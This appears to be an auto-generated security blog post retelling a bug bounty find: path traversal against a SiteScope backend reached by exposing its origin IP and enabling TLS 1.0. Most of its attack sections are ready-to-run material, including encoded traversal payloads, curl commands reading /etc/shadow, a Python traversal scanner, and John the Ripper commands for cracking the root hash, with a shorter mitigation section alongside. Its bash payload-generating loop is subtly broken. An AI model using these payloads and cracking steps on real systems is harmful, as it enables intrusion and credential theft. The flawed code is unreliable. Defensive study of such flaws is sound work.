Listen to this Post
Introduction:
Path traversal (also known as directory traversal) is a web security vulnerability that allows an attacker to access files and directories stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their URL-encoded variants, attackers can read sensitive system files such as /etc/passwd, /etc/shadow, or application configuration files. In this real-world scenario, a penetration tester leveraged backend IP exposure—discovered via Shodan and nslookup—combined with legacy TLS 1.0 support to exploit a full path traversal, earning a $826 bounty.
Learning Objectives:
- Understand how backend server IP exposure bypasses frontend WAF protections.
- Learn to exploit path traversal vulnerabilities using encoded payloads and legacy TLS configurations in Burp Suite.
- Master Linux commands to read sensitive files and simulate mitigation techniques like proper input validation and file permissions.
You Should Know:
1. Backend Discovery & Legacy TLS Exploitation
The first step in this attack chain was identifying an exposed backend server IP. The main domain was inaccessible, but Shodan (a search engine for internet-connected devices) revealed the origin IP. Additionally, `nslookup` confirmed the IP without any WAF (Web Application Firewall) protection. However, the browser could not connect because the backend only supported legacy TLS 1.0—a deprecated protocol. By configuring Burp Suite to enable TLS 1.0, the tester restored connectivity and captured requests.
Step‑by‑step guide:
- Discover backend IP using Shodan: search for the main domain’s SSL certificate or DNS history.
Linux: Use dnsrecon or nslookup nslookup example.com Query Shodan via CLI (requires API key) shodan host <IP>
2. Test connectivity with `curl` forcing TLS 1.0:
curl -k --tlsv1.0 https://<backend-IP>:443
3. Configure Burp Suite to enable legacy TLS:
- Go to Proxy → Options → TLS/SSL.
- Under “Protocols,” check TLSv1.0 and TLSv1.1.
- Under “Client SSL Certificates,” ensure no conflicting restrictions.
- Intercept a request to the backend IP and send to Repeater for manual manipulation.
Windows equivalent (PowerShell):
Force TLS 1.0 with .NET WebRequest Invoke-WebRequest -Uri "https://<backend-IP>/SiteScope/htdocs/artwork/" -SkipCertificateCheck
2. Crafting the Path Traversal Payload
The successful payload used in the bounty was:
`”/SiteScope/htdocs/artwork//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow”`
Notice the double slash after `artwork/` and URL‑encoded `%2e%2e` (which decodes to ..). This technique bypasses basic filters that look for `../` sequences. Each `%2e%2e/` moves one directory up. After traversing eight levels, the payload reaches the root `/` and then accesses /etc/shadow.
Step‑by‑step guide to build and test:
- Identify an input vector that reads a file (e.g.,
?file=artwork/photo.jpg).
2. Inject encoded traversal sequences:
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
3. Use a Linux command to automate fuzzing:
Generate payloads with different depths and encodings
for i in {1..10}; do
payload=$(printf '/%2e%2e'%.0s {1..$i})"/etc/passwd"
echo $payload
done
4. Test with `curl`:
curl -k --tlsv1.0 "https://<backend-IP>/SiteScope/htdocs/artwork//%2e%2e/%2e%2e/%2e%2e/etc/shadow"
Common sensitive files on Linux:
– `/etc/passwd` – user account info
– `/etc/shadow` – password hashes (requires root)
– `/etc/hosts` – local DNS mappings
– `/etc/nginx/nginx.conf` – web server config
– `/proc/self/environ` – environment variables
Windows equivalents for path traversal:
– `C:\Windows\win.ini`
– `C:\boot.ini`
– `..\..\..\Windows\System32\config\SAM`
3. Automating Path Traversal Detection
The hacker mentioned using an automation tool. While the exact tool wasn’t named, typical scripts use payload lists and response analysis. Below is a Python script that automates the discovery of such vulnerabilities.
Python automation script:
import requests
import urllib.parse
target = "https://<backend-IP>/SiteScope/htdocs/artwork/"
payloads = [
"../../../../etc/passwd",
"/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"....//....//....//etc/passwd",
"..;/..;/../etc/passwd"
]
headers = {"User-Agent": "Mozilla/5.0"}
for payload in payloads:
url = target + urllib.parse.quote(payload, safe='')
try:
r = requests.get(url, verify=False, headers=headers, timeout=5)
if "root:x:" in r.text or "bin/bash" in r.text:
print(f"[!] Vulnerable: {url}")
print(r.text[:500])
except Exception as e:
print(f"Error: {e}")
Run with:
pip install requests python3 traversal_scanner.py
4. Mitigation & Hardening Against Path Traversal
To prevent such attacks, developers and system administrators must implement multiple layers of defense.
Step‑by‑step mitigation guide:
- Input validation – reject any input containing
../,..\, `%2e%2e` or their variants.
– Use a whitelist of allowed filenames and prepend a base directory.
2. Disable legacy TLS protocols – on web servers, enforce TLS 1.2 or higher.
– Apache: `SSLProtocol -all +TLSv1.2 +TLSv1.3`
– Nginx: `ssl_protocols TLSv1.2 TLSv1.3;`
– IIS (Windows): Use IIS Crypto tool to disable TLS 1.0/1.1.
3. Hide backend IPs – use a reverse proxy (Cloudflare, AWS ELB, or Nginx) and block direct origin access via firewall rules.
– Linux iptables:
iptables -A INPUT -p tcp --dport 443 -s <trusted-proxy-IP> -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j DROP
4. Run web applications under least privilege – the web server user should not have read access to `/etc/shadow` or system configuration files.
– Set file permissions:
chmod 640 /etc/shadow chown root:shadow /etc/shadow
5. Use a Web Application Firewall (WAF) with rules that block encoded path traversal sequences. Test the WAF using the same payloads.
5. Post-Exploitation: What an Attacker Can Do
Once `/etc/shadow` is exposed, an attacker can crack password hashes using tools like John the Ripper or Hashcat. With `/etc/passwd` and /etc/hosts, internal network mapping becomes possible.
Example hash extraction and cracking:
Extract root hash from /etc/shadow (line starting with root:) grep '^root:' shadow.txt > root_hash.txt Crack with John john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt root_hash.txt
Windows post‑exploitation:
- Dump SAM hashes using `reg save` or Mimikatz (if privileged).
Defensive countermeasures:
- Enforce strong password policies.
- Use file integrity monitoring (e.g., AIDE or Tripwire) to detect unauthorized reads.
- Implement runtime application self-protection (RASP).
6. API Security Implications
Path traversal is not limited to web pages; APIs are equally vulnerable. If an API endpoint accepts a `filePath` parameter, the same encoding tricks work.
Test an API for traversal:
curl -X GET "https://api.example.com/download?file=%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Secure API design:
- Use a unique file identifier (e.g., UUID) mapped to a physical path on the server.
- Never expose filesystem paths directly.
- Validate MIME types and restrict file extensions.
What Undercode Say:
- Backend exposure is a critical blind spot – even if the frontend is offline, misconfigured origin servers directly accessible on the internet are goldmines for attackers.
- Legacy protocols are silent backdoors – TLS 1.0 remains enabled on numerous production systems, allowing attackers to bypass modern security controls. Regular protocol audits are non‑negotiable.
This case highlights the importance of defense in depth: hiding your origin IP, deprecating insecure TLS versions, sanitizing file paths, and restricting filesystem permissions together could have prevented this $826 breach. Automation accelerates discovery, but manual creativity—like URL‑encoded double dots—still bypasses many filters. For red teams, always test encoded variants; for blue teams, reject all input containing `%2e` or `..` after canonicalization.
Prediction:
As more organizations adopt API‑first architectures and serverless backends, path traversal will evolve into parameter pollution attacks against cloud storage (e.g., S3 bucket traversal) and GraphQL resolvers. The intersection of legacy TLS enforcement and misconfigured reverse proxies will remain a top‑10 vector through 2027. Automated scanners integrated with Shodan and Censys will routinely discover such flaws, forcing companies to implement real‑time origin IP rotation and mandatory TLS 1.3 ciphers. Expect bug bounty programs to raise bounties for traversal to file‑hash disclosure (e.g., /etc/shadow) to $1,000–$5,000 range.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Engr Shahid – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
